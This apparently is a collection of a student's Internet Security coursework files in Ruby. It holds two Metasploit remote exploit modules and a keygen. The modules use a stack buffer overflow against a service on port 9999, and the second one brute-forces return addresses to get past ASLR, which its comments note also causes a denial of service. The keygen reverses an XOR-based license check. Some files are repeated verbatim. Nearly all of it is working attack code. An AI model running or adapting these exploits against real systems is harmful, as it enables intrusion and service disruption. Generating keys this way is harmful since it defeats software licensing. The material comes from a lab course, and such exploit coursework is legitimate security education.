PragTob/istask11.rb

## istask11.rb
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  #
  # This exploit affects the debian Linuxmachine from our IS Special task.
  #
  include Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Istask11',
      'Description'    => %q{
        This explois was made as part of the Internet Security Special Task.
      },
      'Author'         => 'Tobi',
       'Version'        => '$Revision: 5 $',
      'Payload'        =>
        {
          'Space'    => 1540,
          'BadChars' => "\x00",
        },
      'Targets'        =>
        [
          # Target 0: Linux
          [
            'Linux',
            {
              'Platform' => 'linux',
              'Ret'      => 0xbfffef34,
              'BufSize' => 1640  # as found out by debugging/boomerang
            }
          ],
        ],
      'DefaultTarget' => 0))

      #set a default port
      register_options(
      [
        Opt::RPORT(9999)
      ],	self.class)
  end


  #
  # The exploit method connects to the remote service and sends the payload
  # followed by the fake return address and the nullbyte to end the string (otherwise it'd continue reading data which woould be bad
  #
  def exploit
    connect

    print_status ("Start exploiting the vulnerable debianmachine")
    #
    # Build the buffer for transmission
    # the Nops after the payload are somehow necessary (didn't work without them), seems like payloads with push would overwrite themselves
    # so I left NOPs which can be written instead of them (for now there are 100 nops, should be more than enough)
    #
    buf = payload.encoded + make_nops(target['BufSize'] - payload.encoded.length) + [target.ret].pack('V') + "\x00"
    print_status("Sending #{buf.length} byte data")

    # Send it off
    sock.put(buf)
    sock.get

    handler

  end

end

## istask12.rb
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  #
  # This exploit affects the debian Linuxmachine from our IS Special task.
  # take note of the description as I couldn't find another way in time.
  # possible problem with overloading the process table of gentoo so that afterwards you can't do anything with the shell and it was an excellent DoS-attack....
  #
  include Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Istask12',
      'Description'    => %q{
        This explois was made as part of the Internet Security Special Task.
     you got to watch the exploit on execution time... as soon as you see a dialog spawn (soemnthing out of the ordinary output) you got to press ctrl + C. afterwards
     through session and session -i you can access the shell again. Yes it does not work with really high addresses, sadly. But than it performs an excellent DoS attack (as well as if you don't press ctrl+c).
      },
      'Author'         => 'Tobi',
       'Version'        => '$Revision: 100 $',
      'Payload'        =>
        {
          'Space'    => 400,  #should be enough for most of the payloads
          'DisableNops' => true, #disabled cause I want to make them manually so I know how many of them i got before the shellcode starts
          'BadChars' => "\x00",
        },
      'Targets'        =>
        [
          # Target 0: Linux
          [
            'Linux',
            {
              'Platform' => 'linux',
              'Ret'      => 0xbf800000, # stack is 8MB big... main shouldn't push that much data on the stack so that we miss out our desired buffer. Plus stack address always starts oxbf (as only 24 byte are randomized)
              'BufSize' => 1032  # as found out by debugging/boomerang
            }
          ],
        ],
      'DefaultTarget' => 0))

      #set a default port
      register_options(
      [
        Opt::RPORT(9999)
      ],	self.class)
  end


  #
  # this time the enemy is secured by ASLR, fortunately not the PaX one. We'll use brute force (which will unfortunately create to many processes for gentoo to handle).
  #
  def exploit

    print_status ("Start exploiting the vulnerable gentoomachine")
    #
    # initialization here we determine a couple of important values
    #
    return_address = target.ret
    nops_after_payload = 12 # 4- aligned
    nops_before_payload = target['BufSize'] - payload.encoded.length - nops_after_payload
    print_status("nops_before_payload: #{nops_before_payload}")

    # initialize the constant part of the buffer (for performancereasons)
    standard_buf = make_nops(nops_before_payload) + payload.encoded + make_nops(nops_after_payload )

    # can't be really sure whether the payloadlength is always 4-aligned (at least I don't think so )
    payload_offset = 4- payload.encoded.length % 4


    # as long as we don't reach a region where our buffer can't be we keep on trying.
    while  (return_address < 0xc0000000)
      connect
      buf = standard_buf + [return_address].pack('V') + "\x00" #building the buffer with the returnaddress we are currently trying (little Endian)
      print_status("trying address #{return_address} ")
      # Send it off
      sock.put(buf)
      sock.get
      handler
      return_address += (nops_before_payload + payload_offset)# incrementing the returnaddress to try new ones (offset to keep 4-aligned
      disconnect
    end


  end

end

## istask2.rb
# This is my keygen (Tobias Pfeiffer) - I don't need ascii-art like that lame lethal-guitar guy

## the numbers as taken from the binary, which are used to XOR encrypt the key  there
encryptnumbers= [0x45, 0x3A ,0xAB, 0xC8 ,0xCC ,0x15 ,0xE3, 0x7A]

# at first we create an array of possible encrypted values for each position (of the key), except the last one (key is 9 chars long)
# sicne ruby doesn't really support multidimensional arrays out of the box we got
# to add an array as an element
possencr = Array.new
for i in 0..7 do
  #we're going to temporarily save the found values here
  temparray = []
  for j in 0..255 do
    keychar = j ^ encryptnumbers[i]
    # if keychar is printable
    if ((keychar >= 32) and (keychar <= 126))
      temparray << j
    end
  end
  possencr << temparray
end

# in the resulting array, the first index is also the index of the keys/encryptnumbers
# the values stored and accessible with the second array are alle possible encryptedchars (95 each as found out)
# note that the numbers are in order (lowest number comes first)
# now we try to genereate a key
crypt = Array.new # saves the crypted signs we chose (cause we need them to make the sum
key = Array.new # saves the corresponding keychars
sum = 0
 for i in 0..4 do  #just 4 because later on we try to fix things (with the last 3 chars), this part here is pure random
    crypt[i] = possencr[i][rand(possencr[i].length)]
    # key is automotically printable due to our awesome array
    key[i] = crypt[i] ^ encryptnumbers[i]
    sum+= crypt[i]
  end

  # so here will be some magice, we'll use our last 3 chars to adjust the sum in
  # such a way that it's between 97 and 122.
  # we're lucky, as I found out our last 3 possible encrypted chars, have no holes
  # in the array, it's 95 elements each and all consecutive
  # 109 = (sum+possencr[5][0]+possencr[6][0]+possencr[7][0]+offset)&255 -- that's just something o remind me how I want to calculate things, 109 because it's the middle of 97 and 122
  offset = 109- ((sum+possencr[5][0]+possencr[6][0]+possencr[7][0])&255)  # &255 ---> take the last byte (least significant)
  if offset <0
    offset = 256 + offset
  end

  # we simbly divide our offset equally to all chars, we could have problems with rounding, but we don't since it's a maximum of +-2 and with 109 we got more than enough space
  index = offset/3
  # now make the damned last three chars!
  for i in 5..7 do
    crypt[i] = possencr[i][index]
    key[i] = crypt[i] ^ encryptnumbers[i]
    sum+= crypt[i]
  end

  # we just need the last byte
  sum = sum & 255
  key[8] = sum

#make them chars (not numbers)
for i in 0..8 do
  key[i]=key[i].chr
end
# make a string out of the array of chars
key = key.to_s
# output the key - BAM!
puts key
	require 'msf/core'

	class Metasploit3 < Msf::Exploit::Remote

	#
	# This exploit affects the debian Linuxmachine from our IS Special task.
	#
	include Exploit::Remote::Tcp

	def initialize(info = {})
	super(update_info(info,
	'Name' => 'Istask11',
	'Description' => %q{
	This explois was made as part of the Internet Security Special Task.
	},
	'Author' => 'Tobi',
	'Version' => '$Revision: 5 $',
	'Payload' =>
	{
	'Space' => 1540,
	'BadChars' => "\x00",
	},
	'Targets' =>
	[
	# Target 0: Linux
	[
	'Linux',
	{
	'Platform' => 'linux',
	'Ret' => 0xbfffef34,
	'BufSize' => 1640 # as found out by debugging/boomerang
	}
	],
	],
	'DefaultTarget' => 0))

	#set a default port
	register_options(
	[
	Opt::RPORT(9999)
	], self.class)
	end


	#
	# The exploit method connects to the remote service and sends the payload
	# followed by the fake return address and the nullbyte to end the string (otherwise it'd continue reading data which woould be bad
	#
	def exploit
	connect

	print_status ("Start exploiting the vulnerable debianmachine")
	#
	# Build the buffer for transmission
	# the Nops after the payload are somehow necessary (didn't work without them), seems like payloads with push would overwrite themselves
	# so I left NOPs which can be written instead of them (for now there are 100 nops, should be more than enough)
	#
	buf = payload.encoded + make_nops(target['BufSize'] - payload.encoded.length) + [target.ret].pack('V') + "\x00"
	print_status("Sending #{buf.length} byte data")

	# Send it off
	sock.put(buf)
	sock.get

	handler

	end

	end
	# This is my keygen (Tobias Pfeiffer) - I don't need ascii-art like that lame lethal-guitar guy

	## the numbers as taken from the binary, which are used to XOR encrypt the key there
	encryptnumbers= [0x45, 0x3A ,0xAB, 0xC8 ,0xCC ,0x15 ,0xE3, 0x7A]

	# at first we create an array of possible encrypted values for each position (of the key), except the last one (key is 9 chars long)
	# sicne ruby doesn't really support multidimensional arrays out of the box we got
	# to add an array as an element
	possencr = Array.new
	for i in 0..7 do
	#we're going to temporarily save the found values here
	temparray = []
	for j in 0..255 do
	keychar = j ^ encryptnumbers[i]
	# if keychar is printable
	if ((keychar >= 32) and (keychar <= 126))
	temparray << j
	end
	end
	possencr << temparray
	end

	# in the resulting array, the first index is also the index of the keys/encryptnumbers
	# the values stored and accessible with the second array are alle possible encryptedchars (95 each as found out)
	# note that the numbers are in order (lowest number comes first)
	# now we try to genereate a key
	crypt = Array.new # saves the crypted signs we chose (cause we need them to make the sum
	key = Array.new # saves the corresponding keychars
	sum = 0
	for i in 0..4 do #just 4 because later on we try to fix things (with the last 3 chars), this part here is pure random
	crypt[i] = possencr[i][rand(possencr[i].length)]
	# key is automotically printable due to our awesome array
	key[i] = crypt[i] ^ encryptnumbers[i]
	sum+= crypt[i]
	end

	# so here will be some magice, we'll use our last 3 chars to adjust the sum in
	# such a way that it's between 97 and 122.
	# we're lucky, as I found out our last 3 possible encrypted chars, have no holes
	# in the array, it's 95 elements each and all consecutive
	# 109 = (sum+possencr[5][0]+possencr[6][0]+possencr[7][0]+offset)&255 -- that's just something o remind me how I want to calculate things, 109 because it's the middle of 97 and 122
	offset = 109- ((sum+possencr[5][0]+possencr[6][0]+possencr[7][0])&255) # &255 ---> take the last byte (least significant)
	if offset <0
	offset = 256 + offset
	end

	# we simbly divide our offset equally to all chars, we could have problems with rounding, but we don't since it's a maximum of +-2 and with 109 we got more than enough space
	index = offset/3
	# now make the damned last three chars!
	for i in 5..7 do
	crypt[i] = possencr[i][index]
	key[i] = crypt[i] ^ encryptnumbers[i]
	sum+= crypt[i]
	end

	# we just need the last byte
	sum = sum & 255
	key[8] = sum

	#make them chars (not numbers)
	for i in 0..8 do
	key[i]=key[i].chr
	end
	# make a string out of the array of chars
	key = key.to_s
	# output the key - BAM!
	puts key